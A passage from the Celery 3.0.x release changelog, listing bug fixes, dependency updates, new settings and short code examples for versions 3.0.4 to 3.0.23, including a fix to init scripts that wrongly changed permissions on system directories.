2013-09-02 01:00 p.m. BST :release-by: Ask Solem - Now depends on :ref:`Kombu 2.5.14 `. - ``send_task`` didn't honor ``link`` and ``link_error`` arguments. This had the side effect of chains not calling unregistered tasks, silently discarding them. Fix contributed by Taylor Nelson. - :mod:`celery.state`: Optimized precedence lookup. Contributed by Matt Robenolt. - POSIX: Daemonization didn't redirect ``sys.stdin`` to ``/dev/null``. Fix contributed by Alexander Smirnov. - Canvas: group bug caused fallback to default app when ``.apply_async`` used (Issue #1516) - Canvas: generator arguments wasn't always pickleable. .. _version-3.0.22: 3.0.22 ====== :release-date: 2013-08-16 04:30 p.m. BST :release-by: Ask Solem - Now depends on :ref:`Kombu 2.5.13 `. - Now depends on :pypi:`billiard` 2.7.3.32 - Fixed bug with monthly and yearly Crontabs (Issue #1465). Fix contributed by Guillaume Gauvrit. - Fixed memory leak caused by time limits (Issue #1129, Issue #1427) - Worker will now sleep if being restarted more than 5 times in one second to avoid spamming with ``worker-online`` events. - Includes documentation fixes Contributed by: Ken Fromm, Andreas Savvides, Alex Kiriukha, Michael Fladischer. .. _version-3.0.21: 3.0.21 ====== :release-date: 2013-07-05 04:30 p.m. BST :release-by: Ask Solem - Now depends on :pypi:`billiard` 2.7.3.31. This version fixed a bug when running without the billiard C extension. - 3.0.20 broke eventlet/gevent support (worker not starting). - Fixed memory leak problem when MongoDB result backend was used with the gevent pool. Fix contributed by Ross Lawley. .. _version-3.0.20: 3.0.20 ====== :release-date: 2013-06-28 04:00 p.m. BST :release-by: Ask Solem - Contains workaround for deadlock problems. A better solution will be part of Celery 3.1. - Now depends on :ref:`Kombu 2.5.12 `. - Now depends on :pypi:`billiard` 2.7.3.30. - :option:`--loader ` argument no longer supported importing loaders from the current directory. - [Worker] Fixed memory leak when restarting after connection lost (Issue #1325). - [Worker] Fixed UnicodeDecodeError at start-up (Issue #1373). Fix contributed by Jessica Tallon. - [Worker] Now properly rewrites unpickleable exceptions again. - Fixed possible race condition when evicting items from the revoked task set. - [generic-init.d] Fixed compatibility with Ubuntu's minimal Dash shell (Issue #1387). Fix contributed by :github_user:`monkut`. - ``Task.apply``/``ALWAYS_EAGER`` now also executes callbacks and errbacks (Issue #1336). - [Worker] The :signal:`worker-shutdown` signal was no longer being dispatched (Issue #1339)j - [Python 3] Fixed problem with threading.Event. Fix contributed by Xavier Ordoquy. - [Python 3] Now handles ``io.UnsupportedOperation`` that may be raised by ``file.fileno()`` in Python 3. - [Python 3] Fixed problem with ``qualname``. - [events.State] Now ignores unknown event-groups. - [MongoDB backend] No longer uses deprecated ``safe`` parameter. Fix contributed by :github_user:`rfkrocktk`. - The eventlet pool now imports on Windows. - [Canvas] Fixed regression where immutable chord members may receive arguments (Issue #1340). Fix contributed by Peter Brook. - [Canvas] chain now accepts generator argument again (Issue #1319). - ``celery.migrate`` command now consumes from all queues if no queues specified. Fix contributed by John Watson. .. _version-3.0.19: 3.0.19 ====== :release-date: 2013-04-17 04:30:00 p.m. BST :release-by: Ask Solem - Now depends on :pypi:`billiard` 2.7.3.28 - A Python 3 related fix managed to disable the deadlock fix announced in 3.0.18. Tests have been added to make sure this doesn't happen again. - Task retry policy: Default max_retries is now 3. This ensures clients won't be hanging while the broker is down. .. note:: You can set a longer retry for the worker by using the :signal:`celeryd_after_setup` signal: .. code-block:: python from celery.signals import celeryd_after_setup @celeryd_after_setup.connect def configure_worker(instance, conf, **kwargs): conf.CELERY_TASK_PUBLISH_RETRY_POLICY = { 'max_retries': 100, 'interval_start': 0, 'interval_max': 1, 'interval_step': 0.2, } - Worker: Will now properly display message body in error messages even if the body is a buffer instance. - 3.0.18 broke the MongoDB result backend (Issue #1303). .. _version-3.0.18: 3.0.18 ====== :release-date: 2013-04-12 05:00:00 p.m. BST :release-by: Ask Solem - Now depends on :pypi:`kombu` 2.5.10. See the :ref:`kombu changelog `. - Now depends on :pypi:`billiard` 2.7.3.27. - Can now specify a white-list of accepted serializers using the new :setting:`CELERY_ACCEPT_CONTENT` setting. This means that you can force the worker to discard messages serialized with pickle and other untrusted serializers. For example to only allow JSON serialized messages use:: CELERY_ACCEPT_CONTENT = ['json'] you can also specify MIME types in the white-list:: CELERY_ACCEPT_CONTENT = ['application/json'] - Fixed deadlock in multiprocessing's pool caused by the semaphore not being released when terminated by signal. - Processes Pool: It's now possible to debug pool processes using GDB. - ``celery report`` now censors possibly secret settings, like passwords and secret tokens. You should still check the output before pasting anything on the internet. - Connection URLs now ignore multiple '+' tokens. - Worker/``statedb``: Now uses pickle protocol 2 (Python 2.5+) - Fixed Python 3 compatibility issues. - Worker: A warning is now given if a worker is started with the same node name as an existing worker. - Worker: Fixed a deadlock that could occur while revoking tasks (Issue #1297). - Worker: The :sig:`HUP` handler now closes all open file descriptors before restarting to ensure file descriptors doesn't leak (Issue #1270). - Worker: Optimized storing/loading the revoked tasks list (Issue #1289). After this change the :option:`celery worker --statedb` file will take up more disk space, but loading from and storing the revoked tasks will be considerably faster (what before took 5 minutes will now take less than a second). - Celery will now suggest alternatives if there's a typo in the broker transport name (e.g., ``ampq`` -> ``amqp``). - Worker: The auto-reloader would cause a crash if a monitored file was unlinked. Fix contributed by Agris Ameriks. - Fixed AsyncResult pickling error. Fix contributed by Thomas Minor. - Fixed handling of Unicode in logging output when using log colors (Issue #427). - :class:`~celery.app.utils.ConfigurationView` is now a ``MutableMapping``. Contributed by Aaron Harnly. - Fixed memory leak in LRU cache implementation. Fix contributed by Romuald Brunet. - ``celery.contrib.rdb``: Now works when sockets are in non-blocking mode. Fix contributed by Theo Spears. - The `inspect reserved` remote control command included active (started) tasks with the reserved tasks (Issue #1030). - The :signal:`task_failure` signal received a modified traceback object meant for pickling purposes, this has been fixed so that it now receives the real traceback instead. - The ``@task`` decorator silently ignored positional arguments, it now raises the expected :exc:`TypeError` instead (Issue #1125). - The worker will now properly handle messages with invalid ETA/expires fields (Issue #1232). - The ``pool_restart`` remote control command now reports an error if the :setting:`CELERYD_POOL_RESTARTS` setting isn't set. - :meth:`@add_defaults`` can now be used with non-dict objects. - Fixed compatibility problems in the Proxy class (Issue #1087). The class attributes ``__module__``, ``__name__`` and ``__doc__`` are now meaningful string objects. Thanks to Marius Gedminas. - MongoDB Backend: The :setting:`MONGODB_BACKEND_SETTINGS` setting now accepts a ``option`` key that lets you forward arbitrary kwargs to the underlying ``pymongo.Connection`` object (Issue #1015). - Beat: The daily backend cleanup task is no longer enabled for result backends that support automatic result expiration (Issue #1031). - Canvas list operations now takes application instance from the first task in the list, instead of depending on the ``current_app`` (Issue #1249). - Worker: Message decoding error log message now includes traceback information. - Worker: The start-up banner now includes system platform. - ``celery inspect|status|control`` now gives an error if used with a SQL based broker transport. .. _version-3.0.17: 3.0.17 ====== :release-date: 2013-03-22 04:00:00 p.m. UTC :release-by: Ask Solem - Now depends on kombu 2.5.8 - Now depends on billiard 2.7.3.23 - RabbitMQ/Redis: thread-less and lock-free rate-limit implementation. This means that rate limits pose minimal overhead when used with RabbitMQ/Redis or future transports using the event-loop, and that the rate-limit implementation is now thread-less and lock-free. The thread-based transports will still use the old implementation for now, but the plan is to use the timer also for other broker transports in Celery 3.1. - Rate limits now works with eventlet/gevent if using RabbitMQ/Redis as the broker. - A regression caused ``task.retry`` to ignore additional keyword arguments. Extra keyword arguments are now used as execution options again. Fix contributed by Simon Engledew. - Windows: Fixed problem with the worker trying to pickle the Django settings module at worker start-up. - generic-init.d: No longer double quotes ``$CELERYD_CHDIR`` (Issue #1235). - generic-init.d: Removes bash-specific syntax. Fix contributed by Pär Wieslander. - Cassandra Result Backend: Now handles the :exc:`~pycassa.AllServersUnavailable` error (Issue #1010). Fix contributed by Jared Biel. - Result: Now properly forwards apps to GroupResults when deserializing (Issue #1249). Fix contributed by Charles-Axel Dein. - ``GroupResult.revoke`` now supports the ``terminate`` and ``signal`` keyword arguments. - Worker: Multiprocessing pool workers now import task modules/configuration before setting up the logging system so that logging signals can be connected before they're dispatched. - chord: The ``AsyncResult`` instance returned now has its ``parent`` attribute set to the header ``GroupResult``. This is consistent with how ``chain`` works. .. _version-3.0.16: 3.0.16 ====== :release-date: 2013-03-07 04:00:00 p.m. UTC :release-by: Ask Solem - Happy International Women's Day! We have a long way to go, so this is a chance for you to get involved in one of the organizations working for making our communities more diverse. - PyLadies — http://pyladies.com - Girls Who Code — http://www.girlswhocode.com - Women Who Code — http://www.meetup.com/Women-Who-Code-SF/ - Now depends on :pypi:`kombu` version 2.5.7 - Now depends on :pypi:`billiard` version 2.7.3.22 - AMQP heartbeats are now disabled by default. Some users experiences issues with heartbeats enabled, and it's not strictly necessary to use them. If you're experiencing problems detecting connection failures, you can re-enable heartbeats by configuring the :setting:`BROKER_HEARTBEAT` setting. - Worker: Now propagates connection errors occurring in multiprocessing callbacks, so that the connection can be reset (Issue #1226). - Worker: Now propagates connection errors occurring in timer callbacks, so that the connection can be reset. - The modules in :setting:`CELERY_IMPORTS` and :setting:`CELERY_INCLUDE` are now imported in the original order (Issue #1161). The modules in :setting:`CELERY_IMPORTS` will be imported first, then continued by :setting:`CELERY_INCLUDE`. Thanks to Joey Wilhelm. - New bash completion for ``celery`` available in the git repository: https://github.com/celery/celery/tree/3.0/extra/bash-completion You can source this file or put it in ``bash_completion.d`` to get auto-completion for the ``celery`` command-line utility. - The node name of a worker can now include unicode characters (Issue #1186). - The repr of a ``crontab`` object now displays correctly (Issue #972). - ``events.State`` no longer modifies the original event dictionary. - No longer uses ``Logger.warn`` deprecated in Python 3. - Cache Backend: Now works with chords again (Issue #1094). - Chord unlock now handles errors occurring while calling the callback. - Generic worker init.d script: Status check is now performed by querying the pid of the instance instead of sending messages. Contributed by Milen Pavlov. - Improved init-scripts for CentOS. - Updated to support Celery 3.x conventions. - Now uses CentOS built-in ``status`` and ``killproc`` - Support for multi-node / multi-pid worker services. - Standard color-coded CentOS service-init output. - A test suite. Contributed by Milen Pavlov. - ``ResultSet.join`` now always works with empty result set (Issue #1219). - A ``group`` consisting of a single task is now supported (Issue #1219). - Now supports the ``pycallgraph`` program (Issue #1051). - Fixed Jython compatibility problems. - Django tutorial: Now mentions that the example app must be added to ``INSTALLED_APPS`` (Issue #1192). .. _version-3.0.15: 3.0.15 ====== :release-date: 2013-02-11 04:30:00 p.m. UTC :release-by: Ask Solem - Now depends on billiard 2.7.3.21 which fixed a syntax error crash. - Fixed bug with :setting:`CELERY_SEND_TASK_SENT_EVENT`. .. _version-3.0.14: 3.0.14 ====== :release-date: 2013-02-08 05:00:00 p.m. UTC :release-by: Ask Solem - Now depends on Kombu 2.5.6 - Now depends on billiard 2.7.3.20 - ``execv`` is now disabled by default. It was causing too many problems for users, you can still enable it using the `CELERYD_FORCE_EXECV` setting. execv was only enabled when transports other than AMQP/Redis was used, and it's there to prevent deadlocks caused by mutexes not being released before the process forks. Unfortunately it also changes the environment introducing many corner case bugs that're hard to fix without adding horrible hacks. Deadlock issues are reported far less often than the bugs that execv are causing, so we now disable it by default. Work is in motion to create non-blocking versions of these transports so that execv isn't necessary (which is the situation with the amqp and redis broker transports) - Chord exception behavior defined (Issue #1172). From Celery 3.1 the chord callback will change state to FAILURE when a task part of a chord raises an exception. It was never documented what happens in this case, and the actual behavior was very unsatisfactory, indeed it will just forward the exception value to the chord callback. For backward compatibility reasons we don't change to the new behavior in a bugfix release, even if the current behavior was never documented. Instead you can enable the :setting:`CELERY_CHORD_PROPAGATES` setting to get the new behavior that'll be default from Celery 3.1. See more at :ref:`chord-errors`. - worker: Fixes bug with ignored and retried tasks. The ``on_chord_part_return`` and ``Task.after_return`` callbacks, nor the ``task_postrun`` signal should be called when the task was retried/ignored. Fix contributed by Vlad. - ``GroupResult.join_native`` now respects the ``propagate`` argument. - ``subtask.id`` added as an alias to ``subtask['options'].id`` .. code-block:: pycon >>> s = add.s(2, 2) >>> s.id = 'my-id' >>> s['options'] {'task_id': 'my-id'} >>> s.id 'my-id' - worker: Fixed error `Could not start worker processes` occurring when restarting after connection failure (Issue #1118). - Adds new signal :signal:`task-retried` (Issue #1169). - `celery events --dumper` now handles connection loss. - Will now retry sending the task-sent event in case of connection failure. - amqp backend: Now uses ``Message.requeue`` instead of republishing the message after poll. - New :setting:`BROKER_HEARTBEAT_CHECKRATE` setting introduced to modify the rate at which broker connection heartbeats are monitored. The default value was also changed from 3.0 to 2.0. - :class:`celery.events.state.State` is now pickleable. Fix contributed by Mher Movsisyan. - :class:`celery.utils.functional.LRUCache` is now pickleable. Fix contributed by Mher Movsisyan. - The stats broadcast command now includes the workers pid. Contributed by Mher Movsisyan. - New ``conf`` remote control command to get a workers current configuration. Contributed by Mher Movsisyan. - Adds the ability to modify the chord unlock task's countdown argument (Issue #1146). Contributed by Jun Sakai - beat: The scheduler now uses the `now()`` method of the schedule, so that schedules can provide a custom way to get the current date and time. Contributed by Raphaël Slinckx - Fixed pickling of configuration modules on Windows or when execv is used (Issue #1126). - Multiprocessing logger is now configured with loglevel ``ERROR`` by default. Since 3.0 the multiprocessing loggers were disabled by default (only configured when the :envvar:`MP_LOG` environment variable was set). .. _version-3.0.13: 3.0.13 ====== :release-date: 2013-01-07 04:00:00 p.m. UTC :release-by: Ask Solem - Now depends on Kombu 2.5 - :pypi:`amqp` has replaced :pypi:`amqplib` as the default transport, gaining support for AMQP 0.9, and the RabbitMQ extensions, including Consumer Cancel Notifications and heartbeats. - support for multiple connection URLs for failover. - Read more in the :ref:`Kombu 2.5 changelog `. - Now depends on billiard 2.7.3.19 - Fixed a deadlock issue that could occur when the producer pool inherited the connection pool instance of the parent process. - The :option:`--loader ` option now works again (Issue #1066). - :program:`celery` umbrella command: All sub-commands now supports the :option:`--workdir ` option (Issue #1063). - Groups included in chains now give GroupResults (Issue #1057) Previously it would incorrectly add a regular result instead of a group result, but now this works: .. code-block:: pycon >>> # [4 + 4, 4 + 8, 16 + 8] >>> res = (add.s(2, 2) | group(add.s(4), add.s(8), add.s(16)))() >>> res - Chains can now chain other chains and use partial arguments (Issue #1057). Example: .. code-block:: pycon >>> c1 = (add.s(2) | add.s(4)) >>> c2 = (add.s(8) | add.s(16)) >>> c3 = (c1 | c2) >>> # 8 + 2 + 4 + 8 + 16 >>> assert c3(8).get() == 38 - Subtasks can now be used with unregistered tasks. You can specify subtasks even if you just have the name:: >>> s = subtask(task_name, args=(), kwargs=()) >>> s.delay() - The :program:`celery shell` command now always adds the current directory to the module path. - The worker will now properly handle the :exc:`pytz.AmbiguousTimeError` exception raised when an ETA/countdown is prepared while being in DST transition (Issue #1061). - force_execv: Now makes sure that task symbols in the original task modules will always use the correct app instance (Issue #1072). - AMQP Backend: Now republishes result messages that have been polled (using ``result.ready()`` and friends, ``result.get()`` won't do this in this version). - Crontab schedule values can now "wrap around" This means that values like ``11-1`` translates to ``[11, 12, 1]``. Contributed by Loren Abrams. - ``multi stopwait`` command now shows the pid of processes. Contributed by Loren Abrams. - Handling of ETA/countdown fixed when the :setting:`CELERY_ENABLE_UTC` setting is disabled (Issue #1065). - A number of unneeded properties were included in messages, caused by accidentally passing ``Queue.as_dict`` as message properties. - Rate limit values can now be float This also extends the string format so that values like ``"0.5/s"`` works. Contributed by Christoph Krybus - Fixed a typo in the broadcast routing documentation (Issue #1026). - Rewrote confusing section about idempotence in the task user guide. - Fixed typo in the daemonization tutorial (Issue #1055). - Fixed several typos in the documentation. Contributed by Marius Gedminas. - Batches: Now works when using the eventlet pool. Fix contributed by Thomas Grainger. - Batches: Added example sending results to ``celery.contrib.batches``. Contributed by Thomas Grainger. - MongoDB backend: Connection ``max_pool_size`` can now be set in :setting:`CELERY_MONGODB_BACKEND_SETTINGS`. Contributed by Craig Younkins. - Fixed problem when using earlier versions of :pypi:`pytz`. Fix contributed by Vlad. - Docs updated to include the default value for the :setting:`CELERY_TASK_RESULT_EXPIRES` setting. - Improvements to the :pypi:`django-celery` tutorial. Contributed by Locker537. - The ``add_consumer`` control command didn't properly persist the addition of new queues so that they survived connection failure (Issue #1079). 3.0.12 ====== :release-date: 2012-11-06 02:00 p.m. UTC :release-by: Ask Solem - Now depends on kombu 2.4.8 - [Redis] New and improved fair queue cycle algorithm (Kevin McCarthy). - [Redis] Now uses a Redis-based mutex when restoring messages. - [Redis] Number of messages that can be restored in one interval is no longer limited (but can be set using the ``unacked_restore_limit`` :setting:`transport option `). - Heartbeat value can be specified in broker URLs (Mher Movsisyan). - Fixed problem with msgpack on Python 3 (Jasper Bryant-Greene). - Now depends on billiard 2.7.3.18 - Celery can now be used with static analysis tools like PyDev/PyCharm/pylint etc. - Development documentation has moved to Read The Docs. The new URL is: http://docs.celeryproject.org/en/master - New :setting:`CELERY_QUEUE_HA_POLICY` setting used to set the default HA policy for queues when using RabbitMQ. - New method ``Task.subtask_from_request`` returns a subtask using the current request. - Results get_many method didn't respect timeout argument. Fix contributed by Remigiusz Modrzejewski - generic_init.d scripts now support setting :envvar:`CELERY_CREATE_DIRS` to always create log and pid directories (Issue #1045). This can be set in your :file:`/etc/default/celeryd`. - Fixed strange kombu import problem on Python 3.2 (Issue #1034). - Worker: ETA scheduler now uses millisecond precision (Issue #1040). - The :option:`--config ` argument to programs is now supported by all loaders. - The :setting:`CASSANDRA_OPTIONS` setting has now been documented. Contributed by Jared Biel. - Task methods (:mod:`celery.contrib.methods`) cannot be used with the old task base class, the task decorator in that module now inherits from the new. - An optimization was too eager and caused some logging messages to never emit. - ``celery.contrib.batches`` now works again. - Fixed missing white-space in ``bdist_rpm`` requirements (Issue #1046). - Event state's ``tasks_by_name`` applied limit before filtering by name. Fix contributed by Alexander A. Sosnovskiy. .. _version-3.0.11: 3.0.11 ====== :release-date: 2012-09-26 04:00 p.m. UTC :release-by: Ask Solem - [security:low] generic-init.d scripts changed permissions of /var/log & /var/run In the daemonization tutorial the recommended directories were as follows: .. code-block:: bash CELERYD_LOG_FILE="/var/log/celery/%n.log" CELERYD_PID_FILE="/var/run/celery/%n.pid" But in the scripts themselves the default files were ``/var/log/celery%n.log`` and ``/var/run/celery%n.pid``, so if the user didn't change the location by configuration, the directories ``/var/log`` and ``/var/run`` would be created - and worse have their permissions and owners changed. This change means that: - Default pid file is ``/var/run/celery/%n.pid`` - Default log file is ``/var/log/celery/%n.log`` - The directories are only created and have their permissions changed if *no custom locations are set*. Users can force paths to be created by calling the ``create-paths`` sub-command: .. code-block:: console $ sudo /etc/init.d/celeryd create-paths .. admonition:: Upgrading Celery won't update init-scripts To update the init-scripts you have to re-download the files from source control and update them manually. You can find the init-scripts for version 3.0.x at: https://github.com/celery/celery/tree/3.0/extra/generic-init.d - Now depends on billiard 2.7.3.17 - Fixes request stack protection when app is initialized more than once (Issue #1003). - ETA tasks now properly works when system timezone isn't same as the configured timezone (Issue #1004). - Terminating a task now works if the task has been sent to the pool but not yet acknowledged by a pool process (Issue #1007). Fix contributed by Alexey Zatelepin - Terminating a task now properly updates the state of the task to revoked, and sends a ``task-revoked`` event. - Generic worker init-script now waits for workers to shutdown by default. - Multi: No longer parses --app option (Issue #1008). - Multi: ``stop_verify`` command renamed to ``stopwait``. - Daemonization: Now delays trying to create pidfile/logfile until after the working directory has been changed into. - :program:`celery worker` and :program:`celery beat` commands now respects the :option:`--no-color ` option (Issue #999). - Fixed typos in eventlet examples (Issue #1000) Fix contributed by Bryan Bishop. Congratulations on opening bug #1000! - Tasks that raise :exc:`~celery.exceptions.Ignore` are now acknowledged. - Beat: Now shows the name of the entry in ``sending due task`` logs. .. _version-3.0.10: 3.0.10 ====== :release-date: 2012-09-20 05:30 p.m. BST :release-by: Ask Solem - Now depends on kombu 2.4.7 - Now depends on billiard 2.7.3.14 - Fixes crash at start-up when using Django and pre-1.4 projects (``setup_environ``). - Hard time limits now sends the KILL signal shortly after TERM, to terminate processes that have signal handlers blocked by C extensions. - Billiard now installs even if the C extension cannot be built. It's still recommended to build the C extension if you're using a transport other than RabbitMQ/Redis (or use forced execv for some other reason). - Pool now sets a ``current_process().index`` attribute that can be used to create as many log files as there are processes in the pool. - Canvas: chord/group/chain no longer modifies the state when called Previously calling a chord/group/chain would modify the ids of subtasks so that: .. code-block:: pycon >>> c = chord([add.s(2, 2), add.s(4, 4)], xsum.s()) >>> c() >>> c() <-- call again at the second time the ids for the tasks would be the same as in the previous invocation. This is now fixed, so that calling a subtask won't mutate any options. - Canvas: Chaining a chord to another task now works (Issue #965). - Worker: Fixed a bug where the request stack could be corrupted if relative imports are used. Problem usually manifested itself as an exception while trying to send a failed task result (``NoneType does not have id attribute``). Fix contributed by Sam Cooke. - Tasks can now raise :exc:`~celery.exceptions.Ignore` to skip updating states or events after return. Example: .. code-block:: python from celery.exceptions import Ignore @task def custom_revokes(): if redis.sismember('tasks.revoked', custom_revokes.request.id): raise Ignore() - The worker now makes sure the request/task stacks aren't modified by the initial ``Task.__call__``. This would previously be a problem if a custom task class defined ``__call__`` and also called ``super()``. - Because of problems the fast local optimization has been disabled, and can only be enabled by setting the :envvar:`USE_FAST_LOCALS` attribute. - Worker: Now sets a default socket timeout of 5 seconds at shutdown so that broken socket reads don't hinder proper shutdown (Issue #975). - More fixes related to late eventlet/gevent patching. - Documentation for settings out of sync with reality: - :setting:`CELERY_TASK_PUBLISH_RETRY` Documented as disabled by default, but it was enabled by default since 2.5 as stated by the 2.5 changelog. - :setting:`CELERY_TASK_PUBLISH_RETRY_POLICY` The default max_retries had been set to 100, but documented as being 3, and the interval_max was set to 1 but documented as 0.2. The default setting are now set to 3 and 0.2 as it was originally documented. Fix contributed by Matt Long. - Worker: Log messages when connection established and lost have been improved. - The repr of a Crontab schedule value of '0' should be '*' (Issue #972). - Revoked tasks are now removed from reserved/active state in the worker (Issue #969) Fix contributed by Alexey Zatelepin. - gevent: Now supports hard time limits using ``gevent.Timeout``. - Documentation: Links to init-scripts now point to the 3.0 branch instead of the development branch (master). - Documentation: Fixed typo in signals user guide (Issue #986). ``instance.app.queues`` -> ``instance.app.amqp.queues``. - Eventlet/gevent: The worker didn't properly set the custom app for new greenlets. - Eventlet/gevent: Fixed a bug where the worker could not recover from connection loss (Issue #959). Also, because of a suspected bug in gevent the :setting:`BROKER_CONNECTION_TIMEOUT` setting has been disabled when using gevent 3.0.9 ===== :release-date: 2012-08-31 06:00 p.m. BST :release-by: Ask Solem - Important note for users of Django and the database scheduler! Recently a timezone issue has been fixed for periodic tasks, but erroneous timezones could have already been stored in the database, so for the fix to work you need to reset the ``last_run_at`` fields. You can do this by executing the following command: .. code-block:: console $ python manage.py shell >>> from djcelery.models import PeriodicTask >>> PeriodicTask.objects.update(last_run_at=None) You also have to do this if you change the timezone or :setting:`CELERY_ENABLE_UTC` setting. - Note about the :setting:`CELERY_ENABLE_UTC` setting. If you previously disabled this just to force periodic tasks to work with your timezone, then you're now *encouraged to re-enable it*. - Now depends on Kombu 2.4.5 which fixes PyPy + Jython installation. - Fixed bug with timezones when :setting:`CELERY_ENABLE_UTC` is disabled (Issue #952). - Fixed a typo in the ``celerybeat`` upgrade mechanism (Issue #951). - Make sure the `exc_info` argument to logging is resolved (Issue #899). - Fixed problem with Python 3.2 and thread join timeout overflow (Issue #796). - A test case was occasionally broken for Python 2.5. - Unit test suite now passes for PyPy 1.9. - App instances now supports the :keyword:`with` statement. This calls the new :meth:`@close` method at exit, which cleans up after the app like closing pool connections. Note that this is only necessary when dynamically creating apps, for example "temporary" apps. - Support for piping a subtask to a chain. For example: .. code-block:: python pipe = sometask.s() | othertask.s() new_pipe = mytask.s() | pipe Contributed by Steve Morin. - Fixed problem with group results on non-pickle serializers. Fix contributed by Steeve Morin. .. _version-3.0.8: 3.0.8 ===== :release-date: 2012-08-29 05:00 p.m. BST :release-by: Ask Solem - Now depends on Kombu 2.4.4 - Fixed problem with :pypi:`amqplib` and receiving larger message payloads (Issue #922). The problem would manifest itself as either the worker hanging, or occasionally a ``Framing error`` exception appearing. Users of the new ``pyamqp://`` transport must upgrade to :pypi:`amqp` 0.9.3. - Beat: Fixed another timezone bug with interval and Crontab schedules (Issue #943). - Beat: The schedule file is now automatically cleared if the timezone is changed. The schedule is also cleared when you upgrade to 3.0.8 from an earlier version, this to register the initial timezone info. - Events: The :event:`worker-heartbeat` event now include processed and active count fields. Contributed by Mher Movsisyan. - Fixed error with error email and new task classes (Issue #931). - ``BaseTask.__call__`` is no longer optimized away if it has been monkey patched. - Fixed shutdown issue when using gevent (Issue #911 & Issue #936). Fix contributed by Thomas Meson. .. _version-3.0.7: 3.0.7 ===== :release-date: 2012-08-24 05:00 p.m. BST :release-by: Ask Solem - Fixes several problems with periodic tasks and timezones (Issue #937). - Now depends on kombu 2.4.2 - Redis: Fixes a race condition crash - Fixes an infinite loop that could happen when retrying establishing the broker connection. - Daemons now redirect standard file descriptors to :file:`/dev/null` Though by default the standard outs are also redirected to the logger instead, but you can disable this by changing the :setting:`CELERY_REDIRECT_STDOUTS` setting. - Fixes possible problems when eventlet/gevent is patched too late. - ``LoggingProxy`` no longer defines ``fileno()`` (Issue #928). - Results are now ignored for the chord unlock task. Fix contributed by Steeve Morin. - Cassandra backend now works if result expiry is disabled. Fix contributed by Steeve Morin. - The traceback object is now passed to signal handlers instead of the string representation. Fix contributed by Adam DePue. - Celery command: Extensions are now sorted by name. - A regression caused the :event:`task-failed` event to be sent with the exception object instead of its string representation. - The worker daemon would try to create the pid file before daemonizing to catch errors, but this file wasn't immediately released (Issue #923). - Fixes Jython compatibility. - ``billiard.forking_enable`` was called by all pools not just the processes pool, which would result in a useless warning if the billiard C extensions weren't installed. .. _version-3.0.6: 3.0.6 ===== :release-date: 2012-08-17 11:00 p.mp.m. Ask Solem - Now depends on kombu 2.4.0 - Now depends on billiard 2.7.3.12 - Redis: Celery now tries to restore messages whenever there are no messages in the queue. - Crontab schedules now properly respects :setting:`CELERY_TIMEZONE` setting. It's important to note that Crontab schedules uses UTC time by default unless this setting is set. Issue #904 and :pypi:`django-celery` #150. - ``billiard.enable_forking`` is now only set by the processes pool. - The transport is now properly shown by :program:`celery report` (Issue #913). - The `--app` argument now works if the last part is a module name (Issue #921). - Fixed problem with unpickleable exceptions (billiard #12). - Adds ``task_name`` attribute to ``EagerResult`` which is always :const:`None` (Issue #907). - Old Task class in :mod:`celery.task` no longer accepts magic kwargs by default (Issue #918). A regression long ago disabled magic kwargs for these, and since no one has complained about it we don't have any incentive to fix it now. - The ``inspect reserved`` control command didn't work properly. - Should now play better with tools for static analysis by explicitly specifying dynamically created attributes in the :mod:`celery` and :mod:`celery.task` modules. - Terminating a task now results in :exc:`~celery.exceptions.RevokedTaskError` instead of a ``WorkerLostError``. - ``AsyncResult.revoke`` now accepts ``terminate`` and ``signal`` arguments. - The :event:`task-revoked` event now includes new fields: ``terminated``, ``signum``, and ``expired``. - The argument to :class:`~celery.exceptions.TaskRevokedError` is now one of the reasons ``revoked``, ``expired`` or ``terminated``. - Old Task class does no longer use :class:`classmethod` for ``push_request`` and ``pop_request`` (Issue #912). - ``GroupResult`` now supports the ``children`` attribute (Issue #916). - ``AsyncResult.collect`` now respects the ``intermediate`` argument (Issue #917). - Fixes example task in documentation (Issue #902). - Eventlet fixed so that the environment is patched as soon as possible. - eventlet: Now warns if Celery related modules that depends on threads are imported before eventlet is patched. - Improved event and camera examples in the monitoring guide. - Disables celery command setuptools entry-points if the command can't be loaded. - Fixed broken ``dump_request`` example in the tasks guide. .. _version-3.0.5: 3.0.5 ===== :release-date: 2012-08-01 04:00 p.m. BST :release-by: Ask Solem - Now depends on kombu 2.3.1 + billiard 2.7.3.11 - Fixed a bug with the -B option (``cannot pickle thread.lock objects``) (Issue #894 + Issue #892, + :pypi:`django-celery` #154). - The :control:`restart_pool` control command now requires the :setting:`CELERYD_POOL_RESTARTS` setting to be enabled This change was necessary as the multiprocessing event that the restart command depends on is responsible for creating many semaphores/file descriptors, resulting in problems in some environments. - ``chain.apply`` now passes args to the first task (Issue #889). - Documented previously secret options to the :pypi:`django-celery` monitor in the monitoring user guide (Issue #396). - Old changelog are now organized in separate documents for each series, see :ref:`history`. .. _version-3.0.4: 3.0.4 ===== :release-date: 2012-07-26 07:00 p.m. BST :release-by: Ask Solem - Now depends on Kombu 2.3 - New experimental standalone Celery monitor: Flower See :ref:`monitoring-flower` to read more about it! Contributed by Mher Movsisyan. - Now supports AMQP heartbeats if using the new ``pyamqp://`` transport. - The :pypi:`amqp` transport requires the :pypi:`amqp` library to be installed: .. code-block:: console $ pip install amqp - Then you need to set the transport URL prefix to ``pyamqp://``. - The default heartbeat value is 10 seconds, but this can be changed using the :setting:`BROKER_HEARTBEAT` setting:: BROKER_HEARTBEAT = 5.0 - If the broker heartbeat is set to 10 seconds, the heartbeats will be monitored every 5 seconds (double the heartbeat rate). See the :ref:`Kombu 2.3 changelog ` for more information. - Now supports RabbitMQ Consumer Cancel Notifications, using the ``pyamqp://`` transport. This is essential when running RabbitMQ in a cluster. See the :ref:`Kombu 2.3 changelog ` for more information. - Delivery info is no longer passed directly through. It was discovered that the SQS transport adds objects that can't be pickled to the delivery info mapping, so we had to go back to using the white-list again. Fixing this bug also means that the SQS transport is now working again. - The semaphore wasn't properly released when a task was revoked (Issue #877). This could lead to tasks being swallowed and not released until a worker restart. Thanks to Hynek Schlawack for debugging the issue. - Retrying a task now also forwards any linked tasks. This means that if a task is part of a chain (or linked in some other way) and that even if the task is retried, then the next task in the chain will be executed when the retry succeeds. - Chords: Now supports setting the interval and other keyword arguments to the chord unlock task. - The interval can now be set as part of the chord subtasks kwargs:: chord(header)(body, interval=10.0) - In addition the chord unlock task now honors the Task.default_retry_delay option, used when none is specified, which also means that the default interval can also be changed using annotations: .. code-block:: python CELERY_ANNOTATIONS = { 'celery.chord_unlock': { 'default_retry_delay': 10.0, } } - New :meth:`@add_defaults` method can add new default configuration dictionaries to the applications configuration. For 